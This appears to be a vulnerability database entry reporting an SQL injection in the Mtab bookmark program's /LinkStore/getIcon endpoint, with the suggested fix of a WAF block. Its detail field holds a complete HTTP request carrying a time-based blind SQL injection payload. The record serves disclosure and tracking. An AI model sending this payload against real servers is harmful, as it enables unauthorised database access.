vendor = "Mtab"
name = "Mtab书签导航程序存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/LinkStore/getIcon"
detail = "POST /LinkStore/getIcon HTTP/1.1 X-Requested-With: XMLHttpRequest Content-Type: application/json Accept: application/json, text/plain, */* Content-Length: 50 Accept-Encoding: gzip,deflate,br Accept-Ldwk: bG91ZG9uZ3dlbmt1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Host: demo.mtab.cc Connection: Keep-alive {\"url\":\"'XOR(if(now()=sysdate(),sleep(4),0))XOR'\"}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0812"
label = "1day"
